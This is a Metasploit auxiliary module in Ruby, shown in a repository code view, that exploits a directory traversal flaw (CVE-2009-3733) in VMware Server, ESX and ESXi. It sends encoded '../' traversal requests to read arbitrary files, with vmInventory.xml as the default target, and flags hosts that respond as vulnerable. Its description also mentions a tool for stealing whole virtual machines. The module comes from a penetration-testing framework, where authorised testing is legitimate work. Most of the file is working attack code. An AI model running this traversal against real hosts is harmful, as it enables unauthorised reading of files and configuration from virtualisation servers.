root / modules / auxiliary / scanner / http / vmware_server_dir_trav.rb @ master
History | View | Annotate | Download (2.5 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Auxiliary |
| 15 |
|
| 16 |
# Exploit mixins should be called first
|
| 17 |
include Msf::Exploit::Remote::HttpClient |
| 18 |
# Scanner mixin should be near last
|
| 19 |
include Msf::Auxiliary::Scanner |
| 20 |
include Msf::Auxiliary::Report |
| 21 |
|
| 22 |
def initialize |
| 23 |
super(
|
| 24 |
'Name' => 'VMware Server Directory Transversal Vulnerability', |
| 25 |
'Version' => '$Revision$', |
| 26 |
'Description' => 'This modules exploits the VMware Server Directory traversal |
| 27 |
vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before |
| 28 |
2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 |
| 29 |
allows remote attackers to read arbitrary files. Common VMware server ports |
| 30 |
80/8222 and 443/8333 SSL. If you want to download the entire VM, check out |
| 31 |
the gueststealer tool.',
|
| 32 |
'Author' => 'CG' , |
| 33 |
'License' => MSF_LICENSE, |
| 34 |
'Version' => '$Revision$', |
| 35 |
'References' =>
|
| 36 |
[ |
| 37 |
[ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2009-0015.html' ], |
| 38 |
[ 'OSVDB', '59440' ], |
| 39 |
[ 'BID', '36842' ], |
| 40 |
[ 'CVE', '2009-3733' ], |
| 41 |
[ 'URL', 'http://fyrmassociates.com/tools/gueststealer-v1.1.pl' ] |
| 42 |
] |
| 43 |
) |
| 44 |
register_options( |
| 45 |
[ |
| 46 |
Opt::RPORT(8222), |
| 47 |
OptString.new('FILE', [ true, "The file to view", '/etc/vmware/hostd/vmInventory.xml']), |
| 48 |
OptString.new('TRAV', [ true, "Traversal Depth", '/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E']), |
| 49 |
], self.class)
|
| 50 |
end
|
| 51 |
|
| 52 |
def run_host(target_host) |
| 53 |
|
| 54 |
begin
|
| 55 |
file = datastore['FILE']
|
| 56 |
trav = datastore['TRAV']
|
| 57 |
res = send_request_raw({
|
| 58 |
'uri' => trav+file,
|
| 59 |
'version' => '1.1', |
| 60 |
'method' => 'GET' |
| 61 |
}, 25)
|
| 62 |
|
| 63 |
if (res and res.code == 200) |
| 64 |
#print_status("Output Of Requested File:\n#{res.body}")
|
| 65 |
print_status("#{target_host}:#{rport} appears vulnerable to VMWare Directory Traversal Vulnerability")
|
| 66 |
report_vuln( |
| 67 |
{
|
| 68 |
:host => target_host,
|
| 69 |
:port => rport,
|
| 70 |
:proto => 'tcp', |
| 71 |
:name => self.fullname, |
| 72 |
:info => res.code,
|
| 73 |
:refs => self.references, |
| 74 |
:exploited_at => Time.now.utc |
| 75 |
} |
| 76 |
) |
| 77 |
else
|
| 78 |
''
|
| 79 |
#print_status("Received #{res.code} for #{trav}#{file}")
|
| 80 |
end
|
| 81 |
|
| 82 |
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout |
| 83 |
rescue ::Timeout::Error, ::Errno::EPIPE |
| 84 |
end
|
| 85 |
end
|
| 86 |
|
| 87 |
end
|